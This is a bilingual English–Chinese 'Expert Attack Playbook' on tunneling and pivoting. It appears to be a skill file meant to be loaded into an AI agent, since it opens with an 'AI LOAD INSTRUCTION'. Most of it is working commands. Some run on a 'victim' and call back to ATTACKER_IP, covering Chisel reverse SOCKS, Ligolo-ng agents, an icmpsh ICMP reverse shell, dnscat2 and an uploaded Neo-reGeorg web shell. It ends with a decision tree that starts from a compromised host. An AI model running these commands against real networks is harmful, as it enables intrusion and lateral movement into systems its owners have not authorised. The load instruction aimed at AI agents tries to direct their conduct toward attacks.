Back to Details

tunneling-and-pivoting

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Tunneling & Pivoting — Expert Attack Playbook

SKILL: 隧道与Pivoting —— 高级攻击操作手册

AI LOAD INSTRUCTION: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
AI加载说明:高级隧道与Pivoting技术,涵盖SSH端口转发(本地/远程/动态/跳转)、Chisel反向SOCKS、Ligolo-ng透明TUN Pivoting、socat中继、DNS/ICMP/HTTP隧道、ProxyChains配置、Windows Pivoting(netsh/plink)以及多层链路。基础模型缺少出口感知工具选择和透明路由设置的相关知识。

0. RELATED ROUTING

0. 相关路由

Before going deep, consider loading:
  • network-protocol-attacks for network-level attacks from pivot positions
  • reverse-shell-techniques for establishing initial access shells
  • unauthorized-access-common-services for exploiting services discovered through pivots
  • linux-privilege-escalation or windows-privilege-escalation after pivoting to new hosts
深入学习前,建议先加载以下内容:
  • network-protocol-attacks 了解从Pivot位置发起的网络层攻击
  • reverse-shell-techniques 了解如何建立初始访问Shell
  • unauthorized-access-common-services 了解如何利用通过Pivot发现的服务
  • linux-privilege-escalationwindows-privilege-escalation 了解Pivot到新主机后的提权方法

1. SSH TUNNELING

1. SSH TUNNELING

Local Port Forward

本地端口转发

Forward a local port to a remote service through the pivot.
bash
undefined
通过Pivot将本地端口转发到远程服务。
bash
undefined

Access INTERNAL_HOST:3306 via localhost:3306

Access INTERNAL_HOST:3306 via localhost:3306

ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N

Access internal web app

Access internal web app

ssh -L 8080:10.10.10.100:80 user@PIVOT -N
ssh -L 8080:10.10.10.100:80 user@PIVOT -N

Browse: http://localhost:8080

Browse: http://localhost:8080

Bind to all interfaces (share with teammates)

Bind to all interfaces (share with teammates)

ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
undefined
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
undefined

Remote Port Forward

远程端口转发

Expose a local service to the pivot host's network.
bash
undefined
将本地服务暴露到Pivot主机的网络中。
bash
undefined

Make attacker's port 8000 accessible on pivot as pivot:9000

Make attacker's port 8000 accessible on pivot as pivot:9000

ssh -R 9000:127.0.0.1:8000 user@PIVOT -N
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N

Expose attacker's listener to internal network

Expose attacker's listener to internal network

ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N

Internal hosts connect to PIVOT:4444 → reaches attacker:4444

Internal hosts connect to PIVOT:4444 → reaches attacker:4444

undefined
undefined

Dynamic Port Forward (SOCKS Proxy)

动态端口转发(SOCKS代理)

bash
undefined
bash
undefined

Create SOCKS4/5 proxy on localhost:1080

Create SOCKS4/5 proxy on localhost:1080

ssh -D 1080 user@PIVOT -N
ssh -D 1080 user@PIVOT -N

Use with proxychains

Use with proxychains

echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24

Or with browser SOCKS proxy → browse internal web apps

Or with browser SOCKS proxy → browse internal web apps

undefined
undefined

Jump Host (ProxyJump)

跳转主机(ProxyJump)

bash
undefined
bash
undefined

Single jump

Single jump

ssh -J jumphost user@TARGET
ssh -J jumphost user@TARGET

Multiple jumps

Multiple jumps

ssh -J jump1,jump2 user@TARGET
ssh -J jump1,jump2 user@TARGET

SSH config for persistent jump

SSH config for persistent jump

~/.ssh/config

~/.ssh/config

Host internal-target HostName 10.10.10.100 User admin ProxyJump user@jumphost.example.com

---
Host internal-target HostName 10.10.10.100 User admin ProxyJump user@jumphost.example.com

---

2. CHISEL

2. CHISEL

Reverse SOCKS Proxy (Most Common)

反向SOCKS代理(最常用)

bash
undefined
bash
undefined

Attacker: start chisel server

Attacker: start chisel server

chisel server --reverse --port 8080
chisel server --reverse --port 8080

Victim: connect back as client, create reverse SOCKS

Victim: connect back as client, create reverse SOCKS

chisel client ATTACKER_IP:8080 R:socks
chisel client ATTACKER_IP:8080 R:socks

Result: SOCKS5 proxy on attacker's 127.0.0.1:1080

Result: SOCKS5 proxy on attacker's 127.0.0.1:1080

proxychains nmap -sT -Pn INTERNAL/24
undefined
proxychains nmap -sT -Pn INTERNAL/24
undefined

Port Forwarding

端口转发

bash
undefined
bash
undefined

Forward specific port

Forward specific port

chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306

Multiple forwards

Multiple forwards

chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80

Reverse port forward (expose attacker service to victim network)

Reverse port forward (expose attacker service to victim network)

chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444

---
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444

---

3. LIGOLO-NG

3. LIGOLO-NG

TUN interface-based pivoting — transparent routing without SOCKS.
bash
undefined
基于TUN接口的Pivoting——无需SOCKS即可实现透明路由。
bash
undefined

Attacker: start proxy

Attacker: start proxy

sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert -laddr 0.0.0.0:11601
sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert -laddr 0.0.0.0:11601

Agent (victim): connect to proxy

Agent (victim): connect to proxy

ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert

In ligolo-proxy console:

In ligolo-proxy console:

session # select agent session ifconfig # view agent's network interfaces start # start tunnel
session # select agent session ifconfig # view agent's network interfaces start # start tunnel

Add routes on attacker to reach internal networks

Add routes on attacker to reach internal networks

sudo ip route add 10.10.10.0/24 dev ligolo sudo ip route add 172.16.0.0/16 dev ligolo
undefined
sudo ip route add 10.10.10.0/24 dev ligolo sudo ip route add 172.16.0.0/16 dev ligolo
undefined

Listener (Reverse Shell Catcher Through Pivot)

监听器(通过Pivot捕获反向Shell)

bash
undefined
bash
undefined

In ligolo-proxy console:

In ligolo-proxy console:

listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444

Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444

undefined
undefined

Double Pivot

双层Pivot

bash
undefined
bash
undefined

Agent 1 on DMZ → tunnel to internal network 1

Agent 1 on DMZ → tunnel to internal network 1

Agent 2 on internal network 1 → tunnel to internal network 2

Agent 2 on internal network 1 → tunnel to internal network 2

Add routes for both networks on attacker

Add routes for both networks on attacker

sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1 sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2

---
sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1 sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2

---

4. SOCAT

4. SOCAT

bash
undefined
bash
undefined

TCP port forward

TCP port forward

socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80

UDP relay

UDP relay

socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53

Encrypted tunnel

Encrypted tunnel

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80

File transfer via socat

File transfer via socat

Receiver:

Receiver:

socat TCP-LISTEN:9999,fork file:received_file,create
socat TCP-LISTEN:9999,fork file:received_file,create

Sender:

Sender:

socat TCP:RECEIVER:9999 file:send_file

---
socat TCP:RECEIVER:9999 file:send_file

---

5. PROXYCHAINS / PROXIFIER

5. PROXYCHAINS / PROXIFIER

ProxyChains Configuration

ProxyChains配置

ini
undefined
ini
undefined

/etc/proxychains4.conf

/etc/proxychains4.conf

strict_chain # fail if any proxy is down
strict_chain # fail if any proxy is down

dynamic_chain # skip dead proxies

dynamic_chain # skip dead proxies

random_chain # randomize proxy order

random_chain # randomize proxy order

[ProxyList] socks5 127.0.0.1 1080 # first hop (SSH dynamic forward) socks5 127.0.0.1 1081 # second hop (if chaining)

```bash
[ProxyList] socks5 127.0.0.1 1080 # first hop (SSH dynamic forward) socks5 127.0.0.1 1081 # second hop (if chaining)

```bash

Usage

Usage

proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24 proxychains crackmapexec smb 10.10.10.0/24 proxychains evil-winrm -i 10.10.10.50 -u admin -p pass

---
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24 proxychains crackmapexec smb 10.10.10.0/24 proxychains evil-winrm -i 10.10.10.50 -u admin -p pass

---

6. WINDOWS PIVOTING

6. WINDOWS PIVOTING

Netsh Port Forwarding

Netsh端口转发

cmd
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

:: List forwards
netsh interface portproxy show all

:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
cmd
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

:: List forwards
netsh interface portproxy show all

:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

Plink (PuTTY CLI)

Plink(PuTTY命令行工具)

cmd
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER

:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER

:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER
cmd
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER

:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER

:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER

7. DNS TUNNELING

7. DNS隧道

bash
undefined
bash
undefined

iodine — IP-over-DNS

iodine — IP-over-DNS

Server (attacker, with NS record pointing to attacker):

Server (attacker, with NS record pointing to attacker):

iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com

Client (victim):

Client (victim):

iodine -f -P password t1.yourdomain.com
iodine -f -P password t1.yourdomain.com

Creates dns0 interface → route traffic through it

Creates dns0 interface → route traffic through it

dnscat2 — command channel over DNS

dnscat2 — command channel over DNS

Server:

Server:

ruby dnscat2.rb yourdomain.com
ruby dnscat2.rb yourdomain.com

Client:

Client:

./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET

---
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET

---

8. ICMP TUNNELING

8. ICMP隧道

bash
undefined
bash
undefined

icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)

icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)

Attacker:

Attacker:

sysctl -w net.ipv4.icmp_echo_ignore_all=1 python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
sysctl -w net.ipv4.icmp_echo_ignore_all=1 python3 icmpsh_m.py ATTACKER_IP VICTIM_IP

Victim (Windows):

Victim (Windows):

icmpsh.exe -t ATTACKER_IP
icmpsh.exe -t ATTACKER_IP

ptunnel-ng — TCP-over-ICMP

ptunnel-ng — TCP-over-ICMP

Server:

Server:

ptunnel-ng -r INTERNAL_HOST -R 22
ptunnel-ng -r INTERNAL_HOST -R 22

Client:

Client:

ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22 ssh -p 2222 user@127.0.0.1

---
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22 ssh -p 2222 user@127.0.0.1

---

9. HTTP TUNNELING

9. HTTP隧道

bash
undefined
bash
undefined

Neo-reGeorg — SOCKS proxy via web shell

Neo-reGeorg — SOCKS proxy via web shell

Generate tunnel web shell:

Generate tunnel web shell:

python3 neoreg.py generate -k PASSWORD
python3 neoreg.py generate -k PASSWORD

Upload tunnel.php/aspx/jsp to target web server

Upload tunnel.php/aspx/jsp to target web server

Connect:

Connect:

python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php

SOCKS proxy on 127.0.0.1:1080

SOCKS proxy on 127.0.0.1:1080

Tunna — HTTP tunnel (alternative)

Tunna — HTTP tunnel (alternative)

python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP

---
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP

---

10. PIVOTING DECISION MATRIX

10. Pivoting决策矩阵

Egress AllowedToolNotes
TCP outbound (any port)Chisel, Ligolo-ng, SSHFastest setup
TCP 80/443 onlyChisel (HTTP/S), Neo-reGeorgBlend with web traffic
DNS only (53/udp)iodine, dnscat2Slow but stealthy
ICMP onlyptunnel-ng, icmpshVery restricted environments
No outboundBind shell + port forward inNeeds inbound access to pivot
Web shell onlyNeo-reGeorg, TunnaWhen only HTTP file upload works
允许的出口流量工具说明
任意端口TCP出站Chisel, Ligolo-ng, SSH配置最快
仅允许TCP 80/443出站Chisel (HTTP/S), Neo-reGeorg可与Web流量混合
仅允许DNS(53/udp)出站iodine, dnscat2速度慢但隐蔽
仅允许ICMP出站ptunnel-ng, icmpsh适用于限制极严格的环境
无出站权限绑定Shell + 入站端口转发需要Pivot有入站访问权限
仅能获取Web ShellNeo-reGeorg, Tunna仅支持HTTP文件上传场景

11. DECISION TREE

11. 决策树

Compromised host — need to reach internal network
├── Can install tools on pivot?
│   ├── YES + outbound TCP allowed?
│   │   ├── Need transparent routing? → Ligolo-ng (§3)
│   │   ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│   │   └── SSH available? → SSH dynamic forward (§1)
│   │
│   ├── YES + only HTTP(S) outbound?
│   │   ├── Chisel over HTTPS (§2)
│   │   └── Upload web tunnel → Neo-reGeorg (§9)
│   │
│   ├── YES + only DNS outbound?
│   │   └── iodine or dnscat2 (§7)
│   │
│   └── YES + only ICMP allowed?
│       └── ptunnel-ng or icmpsh (§8)
├── Cannot install tools (web shell only)?
│   └── Neo-reGeorg / Tunna via web shell (§9)
├── Windows pivot?
│   ├── Admin access? → netsh portproxy (§6)
│   ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│   └── Outbound SSH? → plink (§6)
├── Need multi-layer pivot?
│   ├── Ligolo-ng: multiple agents + route stacking (§3)
│   ├── SSH ProxyJump chaining (§1)
│   └── ProxyChains with multiple SOCKS (§5)
└── Teammate needs access too?
    ├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
    └── Share Ligolo-ng routes via common proxy
已攻陷主机 —— 需要访问内部网络
├── 可以在Pivot上安装工具?
│   ├── 是 + 允许TCP出站?
│   │   ├── 需要透明路由? → Ligolo-ng (§3)
│   │   ├── 需要SOCKS代理? → Chisel反向SOCKS (§2)
│   │   └── 可用SSH? → SSH动态转发 (§1)
│   │
│   ├── 是 + 仅允许HTTP(S)出站?
│   │   ├── HTTPS协议运行Chisel (§2)
│   │   └── 上传Web隧道 → Neo-reGeorg (§9)
│   │
│   ├── 是 + 仅允许DNS出站?
│   │   └── iodine 或 dnscat2 (§7)
│   │
│   └── 是 + 仅允许ICMP?
│       └── ptunnel-ng 或 icmpsh (§8)
├── 无法安装工具(仅能获取Web Shell)?
│   └── 通过Web Shell使用Neo-reGeorg / Tunna (§9)
├── 是Windows Pivot?
│   ├── 有管理员权限? → netsh portproxy (§6)
│   ├── 可用SSH客户端? → ssh.exe (Windows 10+) (§1)
│   └── 允许SSH出站? → plink (§6)
├── 需要多层Pivot?
│   ├── Ligolo-ng: 多Agent + 路由堆叠 (§3)
│   ├── SSH ProxyJump链路 (§1)
│   └── 多SOCKS节点配置ProxyChains (§5)
└── 队友也需要访问?
    ├── SOCKS绑定到0.0.0.0 (ssh -L 0.0.0.0:...)
    └── 通过公共代理共享Ligolo-ng路由